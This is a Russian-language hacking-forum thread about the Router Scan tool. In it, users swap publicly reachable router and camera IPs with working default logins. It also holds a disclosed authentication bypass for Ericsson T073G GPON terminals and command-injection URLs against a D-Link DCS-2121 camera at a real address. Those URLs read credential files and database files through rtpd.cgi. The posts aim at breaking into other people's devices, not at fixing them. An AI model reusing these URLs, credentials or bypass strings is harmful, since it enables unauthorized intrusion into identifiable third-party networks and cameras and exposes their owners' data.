прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Mika77

    Mika77 New Member

    Joined:
    21 Dec 2015
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    sagemcom нет, хотя они находятся в диапазоне 84.18.120.ххх-84.18.121.ххх, остальное возможно с региона диапазон
     
  2. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    а дальше как в кино в одном "ты видишь суслика? нет ? ........."
     
    #3962 Ossen, 17 Jul 2017
    Last edited: 17 Jul 2017
  3. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Это CRC32.

    Написал скрипт для шифровки/расшифровки конфигурационного файла Ericsson T073G (и аналогичных ONT GPON): https://mega.nz/#!Tk4RAKSS!wsPVVhFnClBD6peImV9NeGmHT8FS1QaDTuFAzUcM2Vw

    Расшифровать:
    Code:
    ./decrypt_t073g_config.py decode ont_config.dat ont_config.xml
    Зашифровать:
    Code:
    ./decrypt_t073g_config.py encode ont_config.xml ont_config_new.dat
     
    vika906091, Upsurt, sha9 and 9 others like this.
  4. Lignium

    Lignium New Member

    Joined:
    17 Jul 2017
    Messages:
    4
    Likes Received:
    3
    Reputations:
    0
    Ух ты) Вы сделали мой день! Спасибо огромное! Выручили
     
    sha9 likes this.
  5. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Нашёл заодно уязвимость в этих ONT GPON - обход авторизации при наличии в URL какой-либо из строк: "style/", "script/", "images/", "floid.html", "FLoidForm" и т.д.
    Например:
    Code:
    http://2.133.252.l3/wifi.html?style/
    или скачиваем конфиг:
    Code:
    http://2.133.252.l3/download/ont_config.dat?autorun
     
    4Fun, carartem02, Upsurt and 7 others like this.
  6. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    Есть точка моего же провайдера. 92.38.36.234 ZyXEL Keenetic Lite II Диапазон Ip отличный от моего. От меня не пингуется и RS соответственно его не видит. На роутер с смарта захожу.
     
  7. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    У меня не сканится.

    Не исключено, что бывают такие диапазоны, просканировать которые можно лишь с определённого провайдера (как и с локальными сетями).
     
    Kakoluk, Upsurt, sha9 and 3 others like this.
  8. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    Провайдер у нас один. С одного хаба запитаны. Вчера был на той точке 62.76.111.219, тоже не находился. У меня сейчас 62.76.107.182. Мой находится.
     
    #3968 Pebenok70, 17 Jul 2017
    Last edited: 17 Jul 2017
  9. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    188.134.17.77 Admin:Admin BSSID

    Или это только у меня? :oops:
     
  10. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    #3970 Felis-Sapiens, 18 Jul 2017
    Last edited: 18 Jul 2017
  11. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
  12. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    роутерскан авторизируется, но инфу не вытаскивает. модель роутера чёт я не понял.
    178.168.37.251
    пара - стандарт. а:а
     
  13. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
  14. pkrw88

    pkrw88 Member

    Joined:
    30 Jun 2017
    Messages:
    21
    Likes Received:
    38
    Reputations:
    0
    Вполне себе заходит
     
    sha9 likes this.
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Мало толку от эксплойта, пароль хеширован:
    Code:
    auth.backend = "htdigest"
    auth.backend.htdigest.userfile = "/tmp/lighttpd-htdigest.user"
    
    http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/lighttpd-htdigest.user

    Единственная вкуснятина:
    http://178.168.17.82:81/cgi-bin/rtpd.cgi?cat&/tmp/rt61sta.dat

    Если есть идеи, как добыть больше инфы - велком. :)
     
    Payer and sha9 like this.
  16. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    sha9 likes this.
  17. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    #3977 exzet, 18 Jul 2017
    Last edited: 19 Jul 2017
    Upsurt, Mednik, sha9 and 4 others like this.
  18. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Забыл добавить, что если залогиниться, то по ссылке 178.168.17.82:81/common/info.cgi можно получить некоторую инфу, вида:
    model=DCS-2121
    version=1.04
    build=3227
    nipca=1.6
    name=CAM1
    location=
    macaddr=1c:AF:F7:6B:13:8A
    ipaddr=192.168.1.81
    netmask=255.255.255.0
    gateway=192.168.1.1
    wireless=yes
    inputs=1
    outputs=1
    speaker=yes
    А вообще, там во всю busybox робит, можно дергать некоторую инфу прямо из бд
    http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/umconfig.txt
    http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/actinput.db
    http://178.168.17.82:81/cgi-bin/rtpd.cgi?/bin/busybox&more&/../etc/db/dbinput.db
    Правда в этих ничего интересного нет. Основная бд видать в скрытом каталоге лежит или я ее не нашел.
     
    sha9 and CRACK211 like this.
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В принципе, после успешного логина достаточно GETнуть страницу /eng/admin/st_device.cgi, и там будет инфа в формате XML:
    Code:
    <oem>D-Link</oem>
    <product>DCS-2121</product>
    
    И тому подобное.

    Эксплойт добавил. :)
     
    Benvento, Af5G4337, Kolhozan and 10 others like this.
  20. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    На данный момент, получается только руками перебирать? А в базу как их потом добавить? У нас много их появилось.